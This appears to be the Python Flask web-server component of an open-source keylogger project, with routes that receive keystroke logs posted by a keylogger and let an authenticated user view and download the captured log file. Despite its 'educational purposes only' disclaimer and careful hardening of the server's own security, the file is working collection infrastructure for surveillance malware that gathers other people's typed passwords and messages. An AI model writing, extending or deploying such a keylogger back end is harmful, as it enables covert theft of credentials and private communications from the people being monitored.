""" Web Server Module Flask web server to view and download keylogger logs. For educational purposes only. """ import os import sys import json import secrets import argparse import string from functools import wraps from flask import Flask, render_template_string, send_file, request, Response # ASCII Art Banner BANNER = r""" __ __ _ ____ \ \ / /__| |__ / ___| ___ _ ____ _____ _ __ \ \ /\ / / _ \ '_ \ \___ \ / _ \ '__\ \ / / _ \ '__| \ V V / __/ |_) | ___) | __/ | \ V / __/ | \_/\_/ \___|_.__/ |____/ \___|_| \_/ \___|_| Github: https://github.com/Stalin-143 """ app = Flask(__name__) # Set a secure secret key for session management app.secret_key = os.getenv('FLASK_SECRET_KEY', secrets.token_hex(32)) # Global configuration CONFIG = { 'log_file_path': 'logs/keylog.txt', 'username': 'admin', 'password': 'admin', 'api_key': None } MAX_LOG_PAYLOAD_BYTES = 64 * 1024 MIN_PASSWORD_LENGTH = 12 MIN_API_KEY_LENGTH = 24 MIN_API_KEY_UNIQUE_CHARS = 8 def check_auth(username, password): """ Check if username and password are valid using secure comparison. Args: username (str): Username to check password (str): Password to check Returns: bool: True if valid, False otherwise """ # Use secrets.compare_digest for constant-time comparison to prevent timing attacks username_match = secrets.compare_digest(username, CONFIG['username']) password_match = secrets.compare_digest(password, CONFIG['password']) return username_match and password_match def authenticate(): """Send a 401 response to enable basic auth.""" return Response( 'Unauthorized Access. Please log in with correct credentials.', 401, {'WWW-Authenticate': 'Basic realm="Login Required"'} ) def requires_auth(f): """ Decorator to enforce authentication on routes. 
Args: f: Function to decorate Returns: Decorated function """ @wraps(f) def decorated(*args, **kwargs): auth = request.authorization if not auth or not check_auth(auth.username, auth.password): return authenticate() return f(*args, **kwargs) return decorated def has_valid_api_key(): """ Validate API key for log ingestion endpoint. Returns: bool: True when API key is configured and valid """ configured_api_key = CONFIG.get('api_key') request_api_key = request.headers.get('X-API-Key') if not configured_api_key or not request_api_key: return False return secrets.compare_digest(request_api_key, configured_api_key) def is_strong_password(password): """ Validate password complexity requirements. Args: password (str): Password to validate Returns: bool: True when password meets complexity requirements """ has_upper = any(char.isupper() for char in password) has_lower = any(char.islower() for char in password) has_digit = any(char.isdigit() for char in password) has_special = any(char in string.punctuation for char in password) return has_upper and has_lower and has_digit and has_special def has_sufficient_key_entropy(value): """ Basic entropy checks for shared API key quality. Args: value (str): API key value Returns: bool: True when key has enough character variety """ if not value: return False if len(set(value)) < MIN_API_KEY_UNIQUE_CHARS: return False return True # HTML template to display the log contents and provide a download link HTML_TEMPLATE = '''
{{ log_contents }}
Download Log File
'''
@app.route('/', methods=['GET'])
@requires_auth
def home():
    """
    Display the log file contents.

    At most the last 10MB of the file are shown; larger files are prefixed
    with a note stating how much of the file is displayed.

    Returns:
        HTML page with log contents
    """
    MAX_FILE_SIZE = 10 * 1024 * 1024  # 10MB limit
    log_file_path = CONFIG['log_file_path']

    try:
        # Binary mode: seeking to an arbitrary byte offset is only well
        # defined on binary streams, and it lets us control the decoding.
        with open(log_file_path, 'rb') as file:
            file_size = os.fstat(file.fileno()).st_size
            truncated = file_size > MAX_FILE_SIZE
            if truncated:
                # For large files, read only the last portion
                file.seek(file_size - MAX_FILE_SIZE)
            # Cap the read so a file that grows meanwhile cannot exceed the limit
            raw_contents = file.read(MAX_FILE_SIZE)
    except FileNotFoundError:
        log_contents = "Log file not found."
    except OSError as e:
        log_contents = f"Error reading log file: {e}"
    else:
        # The ingestion endpoint writes UTF-8. errors='replace' keeps the page
        # renderable when the tail starts in the middle of a multi-byte
        # character or the file contains invalid bytes.
        log_contents = raw_contents.decode('utf-8', errors='replace')
        if truncated:
            log_contents = f"[Showing last {MAX_FILE_SIZE/1024/1024:.1f}MB of {file_size/1024/1024:.1f}MB file]\n\n" + log_contents

    return render_template_string(
        HTML_TEMPLATE,
        log_file_path=log_file_path,
        log_contents=log_contents
    )
@app.route('/download', methods=['GET'])
@requires_auth
def download_log():
    """
    Download the log file.

    Returns:
        File download response, or a 404 error message when the log file
        does not exist
    """
    # Resolve against the current working directory up front. send_file may
    # resolve a relative path against the application's root path instead,
    # which would disagree with the existence check below.
    log_file_path = os.path.abspath(CONFIG['log_file_path'])
    if not os.path.isfile(log_file_path):
        return "Log file not found.", 404
    return send_file(log_file_path, as_attachment=True)
@app.route('/', methods=['POST'])
def receive_log():
    """
    Receive log data from keylogger.

    The request must carry a valid API key and a non-empty ``log`` form
    field no larger than MAX_LOG_PAYLOAD_BYTES once encoded as UTF-8. The
    data is appended to the configured log file.

    Returns:
        Success or error message with the matching HTTP status code
        (200, 400, 401, 413 or 500)
    """
    if not has_valid_api_key():
        return "Unauthorized", 401

    log_data = request.form.get('log', '')
    if not log_data:
        return "No log data provided", 400
    if len(log_data.encode('utf-8')) > MAX_LOG_PAYLOAD_BYTES:
        return "Log payload too large", 413

    log_file_path = CONFIG['log_file_path']
    try:
        # Ensure log directory exists (exist_ok makes a prior check redundant)
        log_dir = os.path.dirname(log_file_path)
        if log_dir:
            os.makedirs(log_dir, exist_ok=True)

        # Append log data to file
        with open(log_file_path, 'a', encoding='utf-8') as f:
            f.write(log_data)
    except OSError:
        # Keep the details in the server log; the client only gets a generic
        # message so filesystem paths and errors are not disclosed.
        app.logger.exception("Failed to append to log file %s", log_file_path)
        return "Error: failed to store log data", 500

    return "Log received successfully", 200
def load_config(config_path):
    """
    Load configuration from JSON file.

    Any problem with the file (missing, unreadable, invalid JSON, or a
    top-level value that is not a JSON object) is reported on stdout and
    results in an empty configuration instead of an exception.

    Args:
        config_path (str): Path to the config file

    Returns:
        dict: Configuration dictionary (empty when the file cannot be used)
    """
    try:
        with open(config_path, 'r', encoding='utf-8') as f:
            config = json.load(f)
    except FileNotFoundError:
        print(f"Warning: Config file not found at {config_path}")
        print("Using default configuration.")
        return {}
    except json.JSONDecodeError as e:
        print(f"Error: Invalid JSON in config file: {e}")
        return {}
    except (OSError, UnicodeDecodeError) as e:
        # e.g. the path is a directory, permission denied, or not UTF-8 text
        print(f"Error: Could not read config file {config_path}: {e}")
        return {}

    # Callers use dict methods on the result, so reject lists, strings, etc.
    if not isinstance(config, dict):
        print("Error: Config file must contain a JSON object at the top level.")
        return {}
    return config
def _build_arg_parser():
    """Create the command-line parser for the web server options."""
    parser = argparse.ArgumentParser(
        description='Web Server for Keylogger - For educational purposes only',
        epilog='Always obtain explicit consent before using monitoring tools.'
    )
    parser.add_argument(
        '--config',
        default='config/config.json',
        help='Path to configuration file (default: config/config.json)'
    )
    parser.add_argument(
        '--log-file',
        help='Override log file path from config'
    )
    # --host and --port default to None so that "flag not given" can be told
    # apart from an explicit value; the documented defaults are applied in
    # main() after the config file has been consulted.
    parser.add_argument(
        '--host',
        default=None,
        help='Host to bind to (default: 0.0.0.0)'
    )
    parser.add_argument(
        '--port',
        type=int,
        default=None,
        help='Port to bind to (default: 5000)'
    )
    parser.add_argument(
        '--debug',
        action='store_true',
        help='Enable debug mode'
    )
    return parser


def main():
    """
    Main function to run the web server.

    Parses the command line, loads the JSON config file, reads credentials
    from the WEB_SERVER_USERNAME, WEB_SERVER_PASSWORD and LOG_INGEST_API_KEY
    environment variables, validates them and starts the Flask server.

    Host and port are resolved with the precedence: command-line flag, then
    the ``web_server`` section of the config file, then the built-in default.

    Exits the process with an error when credentials are missing or do not
    meet the password / API key policies, or when debug mode is requested on
    a non-localhost interface.
    """
    print(BANNER)

    args = _build_arg_parser().parse_args()

    # Load configuration
    config = load_config(args.config)
    server_config = config.get('web_server', {}) if isinstance(config, dict) else {}
    if not isinstance(server_config, dict):
        server_config = {}

    # Update global config
    CONFIG['log_file_path'] = args.log_file or server_config.get('log_file_path', 'logs/keylog.txt')

    # Load credentials from environment variables
    CONFIG['username'] = os.getenv('WEB_SERVER_USERNAME')
    CONFIG['password'] = os.getenv('WEB_SERVER_PASSWORD')
    CONFIG['api_key'] = os.getenv('LOG_INGEST_API_KEY')

    # Validate that credentials are set
    if not CONFIG['username'] or not CONFIG['password']:
        print("ERROR: Authentication credentials not set!")
        print("Please set WEB_SERVER_USERNAME and WEB_SERVER_PASSWORD environment variables.")
        print("Example:")
        print(" export WEB_SERVER_USERNAME=admin")
        print(" export WEB_SERVER_PASSWORD=your_secure_password")
        print("\nOr source your .env file:")
        print(" source config/.env")
        sys.exit(1)

    if CONFIG['password'] == 'admin':
        sys.exit("ERROR: Authentication secret uses a disallowed default value.")
    if len(CONFIG['password']) < MIN_PASSWORD_LENGTH or not is_strong_password(CONFIG['password']):
        sys.exit("ERROR: Authentication secret does not meet complexity policy.")
    if not CONFIG['api_key']:
        sys.exit("ERROR: Ingestion API secret is required.")
    if len(CONFIG['api_key']) < MIN_API_KEY_LENGTH:
        sys.exit("ERROR: Ingestion API secret does not meet length policy.")
    if not has_sufficient_key_entropy(CONFIG['api_key']):
        sys.exit("ERROR: Ingestion API secret does not meet entropy policy.")

    # Get server settings: CLI flag > config file > built-in default
    host = args.host if args.host is not None else server_config.get('host', '0.0.0.0')
    port = args.port if args.port is not None else server_config.get('port', 5000)
    debug = bool(args.debug or server_config.get('debug', False))

    if debug and host not in ('127.0.0.1', 'localhost', '::1'):
        print("ERROR: Debug mode is only allowed on localhost interfaces.")
        print("Use a local host binding or disable --debug.")
        sys.exit(1)

    print(f"\nStarting web server on {host}:{port}")
    print(f"Log file path: {CONFIG['log_file_path']}")
    print(f"Username: {CONFIG['username']}")
    print("-" * 50)

    app.run(host=host, port=port, debug=debug)
# Run the server only when this file is executed as a script, not on import.
if __name__ == '__main__':
    main()